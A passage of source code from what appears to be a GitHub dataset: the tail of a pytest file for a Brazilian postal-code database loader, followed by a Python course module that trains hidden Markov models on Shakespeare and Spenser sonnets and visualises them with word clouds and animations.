\"cep_unificado\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_logradouro\",\n \"log_grande_usuario\",\n \"log_unid_oper\",\n ]\n\n\ndef test_get_tables_files_glob():\n assert get_table_files_glob(\"log_faixa_uf\") == \"LOG_FAIXA_UF.TXT\"\n assert get_table_files_glob(\"log_logradouro\") == \"LOG_LOGRADOURO_*.TXT\"\n assert get_table_files_glob(\"cep_unificado\") is None\n\n\n@pytest.mark.parametrize(\n \"table_set,tables_to_populate\",\n [\n (\n TableSetEnum.ALL_TABLES,\n [\n \"cep_unificado\",\n \"ect_pais\",\n \"log_faixa_uf\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_faixa_localidade\",\n \"log_var_loc\",\n \"log_faixa_bairro\",\n \"log_faixa_cpc\",\n \"log_logradouro\",\n \"log_var_bai\",\n \"log_grande_usuario\",\n \"log_num_sec\",\n \"log_unid_oper\",\n \"log_var_log\",\n \"log_faixa_uop\",\n ],\n ),\n (\n TableSetEnum.CEP_TABLES,\n [\n \"cep_unificado\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_logradouro\",\n \"log_grande_usuario\",\n \"log_unid_oper\",\n ],\n ),\n (\n TableSetEnum.UNIFIED_CEP_ONLY,\n [\n \"cep_unificado\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_logradouro\",\n \"log_grande_usuario\",\n \"log_unid_oper\",\n ],\n ),\n ],\n)\ndef test_table_set_to_populate(table_set, tables_to_populate):\n assert table_set.to_populate == tables_to_populate\n\n\n@pytest.mark.parametrize(\n \"table_set,tables_to_drop\",\n [\n (TableSetEnum.ALL_TABLES, []),\n (TableSetEnum.CEP_TABLES, []),\n (\n TableSetEnum.UNIFIED_CEP_ONLY,\n [\n \"ect_pais\",\n \"log_faixa_uf\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_faixa_localidade\",\n \"log_var_loc\",\n \"log_faixa_bairro\",\n \"log_faixa_cpc\",\n \"log_logradouro\",\n \"log_var_bai\",\n \"log_grande_usuario\",\n \"log_num_sec\",\n \"log_unid_oper\",\n \"log_var_log\",\n \"log_faixa_uop\",\n ],\n ),\n ],\n)\ndef test_table_set_to_drop(table_set, tables_to_drop):\n assert table_set.to_drop == tables_to_drop\n","repo_name":"cauethenorio/edne-correios-loader","sub_path":"tests/test_table_set.py","file_name":"test_table_set.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"26589892803","text":"\n###############################################################################\n# Preprocessing\n###############################################################################\n\ndef getAllWordsAndSequences(shakespeare_filename, syllable_dict_filename, syllable_count=False): \n import re \n \n # Load in syllable dictionary and save outputs into a dictionary\n with open(syllable_dict_filename) as f:\n syllable_dict_ = f.readlines()\n\n syllable_dict = {}\n\n for line in syllable_dict_:\n word = line.strip().split()[0]\n num = line.strip().split()[-1]\n syllable_dict[word] = num\n\n # Create a set of words from the syllable dictionary to match with\n # words from the sonnet parsing. \n syllable_words = set(syllable_dict.keys())\n \n with open(shakespeare_filename) as f:\n shakespeare = f.readlines()\n\n # Get start line of each sonnet \n p = re.compile('[\\d]+')\n start_indexes = []\n for i, line in enumerate(shakespeare): \n if p.match(line.strip()):\n start_indexes.append(i)\n \n # Parse each sonnet\n all_words = set()\n all_sequences = []\n for start_ind in start_indexes: \n # Iterate through each line in the sonnet (starts at index +1 to not use the line that has the number)\n for i, line in enumerate(shakespeare[start_ind+1: start_ind+15]): \n\n # Remove whitespace at start + end of line\n clean_line = line.strip()\n\n # Remove punctuation\n clean_line = clean_line.replace(',', '')\n clean_line = clean_line.replace(':', '')\n clean_line = clean_line.replace('\"', '')\n clean_line = clean_line.replace(';', '')\n clean_line = clean_line.replace('.', '')\n clean_line = clean_line.replace('(', '')\n clean_line = clean_line.replace(')', '')\n clean_line = clean_line.replace('!', '')\n clean_line = clean_line.replace('?', '')\n\n # Remove capitalization\n clean_line = clean_line.lower() \n\n # Create array of words\n clean_words = clean_line.split()\n\n # Create sequence\n sequence = [] \n for word in clean_words: \n if word not in syllable_words: \n # Sometimes words have extra apostrophes at the front and/or end of the word\n # that cause it not to appear in the syllable dict. This happens when \n # Shakespeare is quoting something like 'I hate' so we can strip the apostrophes\n # before adding the word\n word = word.strip(\"'\")\n\n all_words.add(word) \n sequence.append(word)\n\n # Add new-line word to signify end of line.\n sequence.append('\\n') \n # TODO: maybe we can have special end-of-line tokens to signify the line #, \n # or whether it is part of quatrain or couplet, or is the volta. \n\n # Add sequence to all sequences\n all_sequences.append(sequence)\n # XOR (i.e. all words not in the intersection of the two sets)\n # Should be empty set \n # print(\"Words that are not in intersection with syllable dictionary:\", syllable_words ^ all_words)\n \n # Word embeddings (assign every word an integer number) \n word_dict = {} \n for i, word in enumerate(all_words): \n word_dict[word] = i\n word_dict['\\n'] = i+1\n \n # Now, convert all_sonnets into integer representation\n all_sonnet_int = []\n for sonnet in all_sequences:\n current_sonnet = []\n for word in sonnet:\n current_sonnet.append(word_dict[word])\n all_sonnet_int.append(current_sonnet)\n \n if syllable_count:\n return all_words, all_sequences, word_dict, all_sonnet_int, syllable_dict\n \n return all_words, all_sequences, word_dict, all_sonnet_int\n\ndef sample_rev_sonents(hmm, obs_map, syllable_dict, n_sonnet=10, start_word=None):\n # Get reverse map.\n obs_map_r = obs_map_reverser(obs_map)\n start_state = None\n if start_word:\n emition_pos=[hmm.O[i][start_word] for i in range(hmm.L)]\n start_state=random.choices([i for i in range(hmm.L)],weights=emition_pos)[0]\n # Sample and convert sentence.\n emission = []\n states = []\n count_sonet = int(syllable_dict[obs_map_r[start_word]][-1])\n state=start_state\n# print(obs_map_r[start_word])\n\n for i in range(100):\n # Append state.\n states.append(state)\n while(True):\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n\n while rand_var > 0:\n rand_var -= hmm.O[state][next_obs]\n next_obs += 1\n\n next_obs -= 1\n emission.append(next_obs)\n if i!=0:\n count_sonet+=int(syllable_dict[obs_map_r[next_obs]][-1])\n if count_sonet==10:\n break\n elif count_sonet>10:\n count_sonet-=int(syllable_dict[obs_map_r[next_obs]][-1])\n emission.pop()\n continue\n else:\n break\n if count_sonet==10:\n break\n\n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= hmm.A[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n sentence = [obs_map_r[i] for i in emission]\n \n if start_word:\n sentence[0]=obs_map_r[start_word]\n\n return ' '.join(sentence[::-1]).capitalize()\n\ndef count_syllables(word):\n \"\"\"\n Taken from syllapy package: https://github.com/mholtzscher/syllapy\n \"\"\"\n syllable_count = 0\n vowels = 'aeiouy'\n if word[0] in vowels:\n syllable_count += 1\n for index in range(1, len(word)):\n if word[index] in vowels and word[index - 1] not in vowels:\n syllable_count += 1\n if word.endswith('e'):\n syllable_count -= 1\n if word.endswith('le') and len(word) > 2 and word[-3] not in vowels:\n syllable_count += 1\n if syllable_count == 0:\n syllable_count += 1\n return syllable_count\n\ndef addSpenserData(spenser_fn, all_words_, all_sequences_, word_dict_, all_sonnet_int_, syllable_dict_):\n \"\"\"\n Takes in spenser filename and adds spenser data to existing structures in same format. \n \"\"\"\n \n # Not ideal, but prevents updating original\n all_words_ = all_words_.copy()\n shake_words = all_words_.copy()\n all_sequences_ = all_sequences_.copy()\n word_dict_ = word_dict_.copy()\n all_sonnet_int_ = all_sonnet_int_.copy()\n syllable_dict_ = syllable_dict_.copy()\n start_idx = len(all_words_)\n\n with open(spenser_fn) as f:\n spenser = f.readlines()\n \n # Regular expression to catch Roman numerals\n p = re.compile(\"^(?=[MDCLXVI])M*(C[MD]|D?C{0,3})(X[CL]|L?X{0,3})(I[XV]|V?I{0,3})$\")\n start_indexes = []\n for i, line in enumerate(spenser): \n if p.match(line.strip()):\n start_indexes.append(i)\n new_words = set()\n new_sequences = []\n for start_ind in start_indexes: \n # Iterate through each line in the sonnet (starts at index +2 to not use the line that has the number)\n for i, line in enumerate(spenser[start_ind+2: start_ind+16]): \n\n # Remove whitespace at start + end of line\n clean_line = line.strip()\n\n # Remove punctuation\n clean_line = clean_line.replace(',', '')\n clean_line = clean_line.replace(':', '')\n clean_line = clean_line.replace('\"', '')\n clean_line = clean_line.replace(';', '')\n clean_line = clean_line.replace('.', '')\n clean_line = clean_line.replace('(', '')\n clean_line = clean_line.replace(')', '')\n clean_line = clean_line.replace('!', '')\n clean_line = clean_line.replace('?', '')\n\n # Remove capitalization\n clean_line = clean_line.lower() \n\n # Create array of words\n clean_words = clean_line.split()\n\n # Create sequence\n sequence = []\n for word in clean_words: \n all_words_.add(word) \n sequence.append(word)\n new_words.add(word)\n sequence.append('\\n')\n all_sequences_.append(sequence)\n new_sequences.append(sequence)\n \n for i, word in enumerate(new_words - shake_words):\n word_dict_[word] = i + start_idx\n\n # Now, convert all_sonnets into integer representation\n for sonnet in new_sequences:\n current_sonnet = []\n for word in sonnet:\n current_sonnet.append(word_dict_[word])\n all_sonnet_int_.append(current_sonnet)\n from nltk.corpus import cmudict\n\n d = cmudict.dict()\n for word in all_words_:\n # Number of digits in NLTK (i.e. number of vowel stress marks) approximates number of syllables\n try:\n num_syls = len([y for y in d[word][-1] if y[-1].isdigit()])\n syllable_dict_[word] = [num_syls]\n except:\n syllable_dict_[word] = [count_syllables(word)]\n \n return all_words_, all_sequences_, word_dict_, all_sonnet_int_, syllable_dict_\n\n###############################################################################\n# RNN Helper Functions\n###############################################################################\n## Helper function for pretty time\nimport time \nimport math\ndef timeSince(since):\n now = time.time()\n s = now - since\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\n###############################################################################\n# HMM model\n###############################################################################\nimport numpy as np \nimport random\n\nclass HiddenMarkovModel:\n '''\n Class implementation of Hidden Markov Models.\n '''\n\n def __init__(self, A, O):\n '''\n Initializes an HMM. Assumes the following:\n - States and observations are integers starting from 0. \n - There is a start state (see notes on A_start below). There\n is no integer associated with the start state, only\n probabilities in the vector A_start.\n - There is no end state. \n\n Arguments:\n A: Transition matrix with dimensions L x L.\n The (i, j)^th element is the probability of\n transitioning from state i to state j. Note that\n this does not include the starting probabilities.\n\n O: Observation matrix with dimensions L x D.\n The (i, j)^th element is the probability of\n emitting observation j given state i.\n\n Parameters:\n L: Number of states.\n\n D: Number of observations.\n \n A: The transition matrix.\n \n O: The observation matrix.\n \n A_start: Starting transition probabilities. The i^th element\n is the probability of transitioning from the start\n state to state i. For simplicity, we assume that\n this distribution is uniform.\n '''\n\n self.L = len(A)\n self.D = len(O[0])\n self.A = A\n self.O = O\n self.A_start = [1. / self.L for _ in range(self.L)]\n\n\n def viterbi(self, x):\n '''\n Uses the Viterbi algorithm to find the max probability state \n sequence corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n Returns:\n max_seq: Output sequence corresponding to x with the highest\n probability.\n '''\n\n M = len(x) # Length of sequence.\n\n # The (i, j)^th elements of probs and seqs are the max probability\n # of the prefix of length i ending in state j and the prefix\n # that gives this probability, respectively.\n #\n # For instance, probs[1][0] is the probability of the prefix of\n # length 1 ending in state 0.\n probs = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n seqs = [['' for _ in range(self.L)] for _ in range(M + 1)]\n\n # Calculate initial prefixes and probabilities.\n for curr in range(self.L):\n probs[1][curr] = self.A_start[curr] * self.O[curr][x[0]]\n seqs[1][curr] = str(curr)\n\n # Calculate best prefixes and probabilities throughout sequence.\n for t in range(2, M + 1):\n # Iterate over all possible current states.\n for curr in range(self.L):\n max_prob = float(\"-inf\")\n max_prefix = ''\n\n # Iterate over all possible previous states to find one\n # that would maximize the probability of the current state.\n for prev in range(self.L):\n curr_prob = probs[t - 1][prev] \\\n * self.A[prev][curr] \\\n * self.O[curr][x[t - 1]]\n\n # Continually update max probability and prefix.\n if curr_prob >= max_prob:\n max_prob = curr_prob\n max_prefix = seqs[t - 1][prev]\n\n # Store the max probability and prefix.\n probs[t][curr] = max_prob\n seqs[t][curr] = max_prefix + str(curr)\n\n # Find the index of the max probability of a sequence ending in x^M\n # and the corresponding output sequence.\n max_i = max(enumerate(probs[-1]), key=lambda x: x[1])[0]\n max_seq = seqs[-1][max_i]\n\n return max_seq\n\n\n def forward(self, x, normalize=False):\n '''\n Uses the forward algorithm to calculate the alpha probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n alphas: Vector of alphas.\n\n The (i, j)^th element of alphas is alpha_j(i),\n i.e. the probability of observing prefix x^1:i\n and state y^i = j.\n\n e.g. alphas[1][0] corresponds to the probability\n of observing x^1:1, i.e. the first observation,\n given that y^1 = 0, i.e. the first state is 0.\n '''\n\n M = len(x) # Length of sequence.\n alphas = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n\n # Note that alpha_j(0) is already correct for all j's.\n # Calculate alpha_j(1) for all j's.\n for curr in range(self.L):\n alphas[1][curr] = self.A_start[curr] * self.O[curr][x[0]]\n\n # Calculate alphas throughout sequence.\n for t in range(1, M):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible previous states to accumulate\n # the probabilities of all paths from the start state to\n # the current state.\n for prev in range(self.L):\n prob += alphas[t][prev] \\\n * self.A[prev][curr] \\\n * self.O[curr][x[t]]\n\n # Store the accumulated probability.\n alphas[t + 1][curr] = prob\n\n if normalize:\n norm = sum(alphas[t + 1])\n for curr in range(self.L):\n alphas[t + 1][curr] /= norm\n\n return alphas\n\n\n def backward(self, x, normalize=False):\n '''\n Uses the backward algorithm to calculate the beta probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n betas: Vector of betas.\n\n The (i, j)^th element of betas is beta_j(i), i.e.\n the probability of observing prefix x^(i+1):M and\n state y^i = j.\n\n e.g. betas[M][0] corresponds to the probability\n of observing x^M+1:M, i.e. no observations,\n given that y^M = 0, i.e. the last state is 0.\n '''\n\n M = len(x) # Length of sequence.\n betas = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n\n # Initialize initial betas.\n for curr in range(self.L):\n betas[-1][curr] = 1\n\n # Calculate betas throughout sequence.\n for t in range(-1, -M - 1, -1):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible next states to accumulate\n # the probabilities of all paths from the end state to\n # the current state.\n for nxt in range(self.L):\n if t == -M:\n prob += betas[t][nxt] \\\n * self.A_start[nxt] \\\n * self.O[nxt][x[t]]\n\n else:\n prob += betas[t][nxt] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]]\n\n # Store the accumulated probability.\n betas[t - 1][curr] = prob\n\n if normalize:\n norm = sum(betas[t - 1])\n for curr in range(self.L):\n betas[t - 1][curr] /= norm\n\n return betas\n\n\n def supervised_learning(self, X, Y):\n '''\n Trains the HMM using the Maximum Likelihood closed form solutions\n for the transition and observation matrices on a labeled\n datset (X, Y). Note that this method does not return anything, but\n instead updates the attributes of the HMM object.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of variable-length lists, consisting of integers \n ranging from 0 to D - 1. In other words, a list of\n lists.\n\n Y: A dataset consisting of state sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to L - 1. In other words, a list of\n lists.\n\n Note that the elements in X line up with those in Y.\n '''\n\n # Calculate each element of A using the M-step formulas.\n for curr in range(self.L):\n for nxt in range(self.L):\n num = 0.\n den = 0.\n\n for i in range(len(X)):\n x = X[i]\n y = Y[i]\n M = len(x)\n \n num += len([1 for i in range(M - 1) \\\n if y[i] == curr and y[i + 1] == nxt])\n den += len([1 for i in range(M - 1) if y[i] == curr])\n\n self.A[curr][nxt] = num / den\n\n # Calculate each element of O using the M-step formulas.\n for curr in range(self.L):\n for xt in range(self.D):\n num = 0.\n den = 0.\n\n for i in range(len(X)):\n x = X[i]\n y = Y[i]\n M = len(x)\n \n num += len([1 for i in range(M) \\\n if y[i] == curr and x[i] == xt])\n den += len([1 for i in range(M) if y[i] == curr])\n\n self.O[curr][xt] = num / den\n\n\n def unsupervised_learning(self, X, N_iters):\n '''\n Trains the HMM using the Baum-Welch algorithm on an unlabeled\n datset X. Note that this method does not return anything, but\n instead updates the attributes of the HMM object.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of variable-length lists, consisting of integers ranging\n from 0 to D - 1. In other words, a list of lists.\n\n N_iters: The number of iterations to train on.\n '''\n\n # Note that a comment starting with 'E' refers to the fact that\n # the code under the comment is part of the E-step.\n\n # Similarly, a comment starting with 'M' refers to the fact that\n # the code under the comment is part of the M-step.\n\n for iteration in range(1, N_iters + 1):\n if iteration % 10 == 0:\n print(\"Iteration: \" + str(iteration))\n\n # Numerator and denominator for the update terms of A and O.\n A_num = [[0. for i in range(self.L)] for j in range(self.L)]\n O_num = [[0. for i in range(self.D)] for j in range(self.L)]\n A_den = [0. for i in range(self.L)]\n O_den = [0. for i in range(self.L)]\n\n # For each input sequence:\n for x in X:\n M = len(x)\n # Compute the alpha and beta probability vectors.\n alphas = self.forward(x, normalize=True)\n betas = self.backward(x, normalize=True)\n\n # E: Update the expected observation probabilities for a\n # given (x, y).\n # The i^th index is P(y^t = i, x).\n for t in range(1, M + 1):\n P_curr = [0. for _ in range(self.L)]\n \n for curr in range(self.L):\n P_curr[curr] = alphas[t][curr] * betas[t][curr]\n\n # Normalize the probabilities.\n norm = sum(P_curr)\n for curr in range(len(P_curr)):\n P_curr[curr] /= norm\n\n for curr in range(self.L):\n if t != M:\n A_den[curr] += P_curr[curr]\n O_den[curr] += P_curr[curr]\n O_num[curr][x[t - 1]] += P_curr[curr]\n\n \n # E: Update the expectedP(y^j = a, y^j+1 = b, x) for given (x, y)\n for t in range(1, M):\n P_curr_nxt = [[0. for _ in range(self.L)] for _ in range(self.L)]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] = alphas[t][curr] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]] \\\n * betas[t + 1][nxt]\n\n # Normalize:\n norm = 0\n for lst in P_curr_nxt:\n norm += sum(lst)\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] /= norm\n\n # Update A_num\n for curr in range(self.L):\n for nxt in range(self.L):\n A_num[curr][nxt] += P_curr_nxt[curr][nxt]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n self.A[curr][nxt] = A_num[curr][nxt] / A_den[curr]\n\n for curr in range(self.L):\n for xt in range(self.D):\n self.O[curr][xt] = O_num[curr][xt] / O_den[curr]\n\n def generate_emission(self, M):\n '''\n Generates an emission of length M, assuming that the starting state\n is chosen uniformly at random. \n\n Arguments:\n M: Length of the emission to generate.\n\n Returns:\n emission: The randomly generated emission as a list.\n\n states: The randomly generated states as a list.\n '''\n\n emission = []\n state = random.choice(range(self.L))\n states = []\n\n for t in range(M):\n # Append state.\n states.append(state)\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n\n while rand_var > 0:\n rand_var -= self.O[state][next_obs]\n next_obs += 1\n\n next_obs -= 1\n emission.append(next_obs)\n\n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= self.A[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n\n return emission, states\n\n\n def probability_alphas(self, x):\n '''\n Finds the maximum probability of a given input sequence using\n the forward algorithm.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n Returns:\n prob: Total probability that x can occur.\n '''\n\n # Calculate alpha vectors.\n alphas = self.forward(x)\n\n # alpha_j(M) gives the probability that the output sequence ends\n # in j. Summing this value over all possible states j gives the\n # total probability of x paired with any output sequence, i.e. the\n # probability of x.\n prob = sum(alphas[-1])\n return prob\n\n\n def probability_betas(self, x):\n '''\n Finds the maximum probability of a given input sequence using\n the backward algorithm.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n Returns:\n prob: Total probability that x can occur.\n '''\n\n betas = self.backward(x)\n\n # beta_j(0) gives the probability of the output sequence. Summing\n # this over all states and then normalizing gives the total\n # probability of x paired with any output sequence, i.e. the\n # probability of x.\n prob = sum([betas[1][k] * self.A_start[k] * self.O[k][x[0]] \\\n for k in range(self.L)])\n\n return prob\n\n\ndef supervised_HMM(X, Y):\n '''\n Helper function to train a supervised HMM. The function determines the\n number of unique states and observations in the given data, initializes\n the transition and observation matrices, creates the HMM, and then runs\n the training function for supervised learning.\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to D - 1. In other words, a list of lists.\n Y: A dataset consisting of state sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to L - 1. In other words, a list of lists.\n Note that the elements in X line up with those in Y.\n '''\n # Make a set of observations.\n observations = set()\n for x in X:\n observations |= set(x)\n\n # Make a set of states.\n states = set()\n for y in Y:\n states |= set(y)\n \n # Compute L and D.\n L = len(states)\n D = len(observations)\n\n # Randomly initialize and normalize matrix A.\n A = [[random.random() for i in range(L)] for j in range(L)]\n\n for i in range(len(A)):\n norm = sum(A[i])\n for j in range(len(A[i])):\n A[i][j] /= norm\n \n # Randomly initialize and normalize matrix O.\n O = [[random.random() for i in range(D)] for j in range(L)]\n\n for i in range(len(O)):\n norm = sum(O[i])\n for j in range(len(O[i])):\n O[i][j] /= norm\n\n # Train an HMM with labeled data.\n HMM = HiddenMarkovModel(A, O)\n HMM.supervised_learning(X, Y)\n\n return HMM\n\ndef unsupervised_HMM(X, n_states, N_iters,rng=np.random.RandomState(1)):\n '''\n Helper function to train an unsupervised HMM. The function determines the\n number of unique observations in the given data, initializes\n the transition and observation matrices, creates the HMM, and then runs\n the training function for unsupervised learing.\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to D - 1. In other words, a list of lists.\n n_states: Number of hidden states to use in training.\n \n N_iters: The number of iterations to train on.\n rng: The random number generator for reproducible result.\n Default to RandomState(1).\n '''\n\n # Make a set of observations.\n observations = set()\n for x in X:\n observations |= set(x)\n \n # Compute L and D.\n L = n_states\n D = len(observations)\n\n # Randomly initialize and normalize matrix A.\n A = [[rng.random() for i in range(L)] for j in range(L)]\n\n for i in range(len(A)):\n norm = sum(A[i])\n for j in range(len(A[i])):\n A[i][j] /= norm\n \n # Randomly initialize and normalize matrix O.\n O = [[rng.random() for i in range(D)] for j in range(L)]\n\n for i in range(len(O)):\n norm = sum(O[i])\n for j in range(len(O[i])):\n O[i][j] /= norm\n\n # Train an HMM with unlabeled data.\n HMM = HiddenMarkovModel(A, O)\n HMM.unsupervised_learning(X, N_iters)\n\n return HMM\n\n\n###############################################################################\n# CS/CNS/EE 155 2018\n# Problem Set 6\n#\n# Author: Andrew Kang\n# Description: Set 6 HMM helper\n###############################################################################\n\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nfrom matplotlib import animation\nfrom matplotlib.animation import FuncAnimation\n\n\n####################\n# WORDCLOUD FUNCTIONS\n####################\n\ndef mask():\n # Parameters.\n r = 128\n d = 2 * r + 1\n\n # Get points in a circle.\n y, x = np.ogrid[-r:d-r, -r:d-r]\n circle = (x**2 + y**2 <= r**2)\n\n # Create mask.\n mask = 255 * np.ones((d, d), dtype=np.uint8)\n mask[circle] = 0\n\n return mask\n\ndef text_to_wordcloud(text, max_words=50, title='', show=True):\n plt.close('all')\n\n # Generate a wordcloud image.\n wordcloud = WordCloud(random_state=0,\n max_words=max_words,\n background_color='white',\n mask=mask()).generate(text)\n\n # Show the image.\n if show:\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis('off')\n plt.title(title, fontsize=24)\n plt.show()\n\n return wordcloud\n\ndef states_to_wordclouds(hmm, obs_map, max_words=50, show=True):\n # Initialize.\n M = 100000\n n_states = len(hmm.A)\n obs_map_r = obs_map_reverser(obs_map)\n wordclouds = []\n\n # Generate a large emission.\n emission, states = hmm.generate_emission(M)\n\n # For each state, get a list of observations that have been emitted\n # from that state.\n obs_count = []\n for i in range(n_states):\n obs_lst = np.array(emission)[np.where(np.array(states) == i)[0]]\n obs_count.append(obs_lst)\n\n # For each state, convert it into a wordcloud.\n for i in range(n_states):\n obs_lst = obs_count[i]\n sentence = [obs_map_r[j] for j in obs_lst]\n sentence_str = ' '.join(sentence)\n\n wordclouds.append(text_to_wordcloud(sentence_str, max_words=max_words, title='State %d' % i, show=show))\n\n return wordclouds\n\n\n####################\n# HMM FUNCTIONS\n####################\n\ndef parse_observations(text):\n # Convert text to dataset.\n lines = [line.split() for line in text.split('\\n') if line.split()]\n\n obs_counter = 0\n obs = []\n obs_map = {}\n\n for line in lines:\n obs_elem = []\n \n for word in line:\n word = re.sub(r'[^\\w]', '', word).lower()\n if word not in obs_map:\n # Add unique words to the observations map.\n obs_map[word] = obs_counter\n obs_counter += 1\n \n # Add the encoded word.\n obs_elem.append(obs_map[word])\n \n # Add the encoded sequence.\n obs.append(obs_elem)\n\n return obs, obs_map\n\ndef obs_map_reverser(obs_map):\n obs_map_r = {}\n\n for key in obs_map:\n obs_map_r[obs_map[key]] = key\n\n return obs_map_r\n\ndef sample_sentence(hmm, obs_map, n_words=100):\n # Get reverse map.\n obs_map_r = obs_map_reverser(obs_map)\n # Sample and convert sentence.\n emission, states = hmm.generate_emission(n_words)\n sentence = [obs_map_r[i] for i in emission]\n \n# if start_word:\n# sentence[0]=obs_map_r[start_word]\n\n return ' '.join(sentence).capitalize()+\"...\"\n\n####################\n# HMM VISUALIZATION FUNCTIONS\n####################\n\ndef visualize_sparsities(hmm, O_max_cols=50, O_vmax=0.1):\n plt.close('all')\n plt.set_cmap('viridis')\n\n # Visualize sparsity of A.\n plt.imshow(hmm.A, vmax=1.0)\n plt.colorbar()\n plt.title('Sparsity of A matrix')\n plt.show()\n\n # Visualize parsity of O.\n plt.imshow(np.array(hmm.O)[:, :O_max_cols], vmax=O_vmax, aspect='auto')\n plt.colorbar()\n plt.title('Sparsity of O matrix')\n plt.show()\n\n\n####################\n# HMM ANIMATION FUNCTIONS\n####################\n\ndef animate_emission(hmm, obs_map, M=8, height=12, width=12, delay=1):\n # Parameters.\n lim = 1200\n text_x_offset = 40\n text_y_offset = 80\n x_offset = 580\n y_offset = 520\n R = 420\n r = 100\n arrow_size = 20\n arrow_p1 = 0.03\n arrow_p2 = 0.02\n arrow_p3 = 0.06\n \n # Initialize.\n n_states = len(hmm.A)\n obs_map_r = obs_map_reverser(obs_map)\n wordclouds = states_to_wordclouds(hmm, obs_map, max_words=20, show=False)\n\n # Initialize plot. \n fig, ax = plt.subplots()\n fig.set_figheight(height)\n fig.set_figwidth(width)\n ax.grid('off')\n plt.axis('off')\n ax.set_xlim([0, lim])\n ax.set_ylim([0, lim])\n\n # Plot each wordcloud.\n for i, wordcloud in enumerate(wordclouds):\n x = x_offset + int(R * np.cos(np.pi * 2 * i / n_states))\n y = y_offset + int(R * np.sin(np.pi * 2 * i / n_states))\n ax.imshow(wordcloud.to_array(), extent=(x - r, x + r, y - r, y + r), aspect='auto', zorder=-1)\n\n # Initialize text.\n text = ax.text(text_x_offset, lim - text_y_offset, '', fontsize=24)\n \n # Make the arrows.\n zorder_mult = n_states ** 2 * 100\n arrows = []\n for i in range(n_states):\n row = []\n for j in range(n_states):\n # Arrow coordinates.\n x_i = x_offset + R * np.cos(np.pi * 2 * i / n_states)\n y_i = y_offset + R * np.sin(np.pi * 2 * i / n_states)\n x_j = x_offset + R * np.cos(np.pi * 2 * j / n_states)\n y_j = y_offset + R * np.sin(np.pi * 2 * j / n_states)\n \n dx = x_j - x_i\n dy = y_j - y_i\n d = np.sqrt(dx**2 + dy**2)\n\n if i != j:\n arrow = ax.arrow(x_i + (r/d + arrow_p1) * dx + arrow_p2 * dy,\n y_i + (r/d + arrow_p1) * dy + arrow_p2 * dx,\n (1 - 2 * r/d - arrow_p3) * dx,\n (1 - 2 * r/d - arrow_p3) * dy,\n color=(1 - hmm.A[i][j], ) * 3,\n head_width=arrow_size, head_length=arrow_size,\n zorder=int(hmm.A[i][j] * zorder_mult))\n else:\n arrow = ax.arrow(x_i, y_i, 0, 0,\n color=(1 - hmm.A[i][j], ) * 3,\n head_width=arrow_size, head_length=arrow_size,\n zorder=int(hmm.A[i][j] * zorder_mult))\n\n row.append(arrow)\n arrows.append(row)\n\n emission, states = hmm.generate_emission(M)\n\n def animate(i):\n if i >= delay:\n i -= delay\n\n if i == 0:\n arrows[states[0]][states[0]].set_color('red')\n elif i == 1:\n arrows[states[0]][states[0]].set_color((1 - hmm.A[states[0]][states[0]], ) * 3)\n arrows[states[i - 1]][states[i]].set_color('red')\n else:\n arrows[states[i - 2]][states[i - 1]].set_color((1 - hmm.A[states[i - 2]][states[i - 1]], ) * 3)\n arrows[states[i - 1]][states[i]].set_color('red')\n\n # Set text.\n text.set_text(' '.join([obs_map_r[e] for e in emission][:i+1]).capitalize())\n\n return arrows + [text]\n\n # Animate!\n print('\\nAnimating...')\n anim = FuncAnimation(fig, animate, frames=M+delay, interval=1000)\n\n return 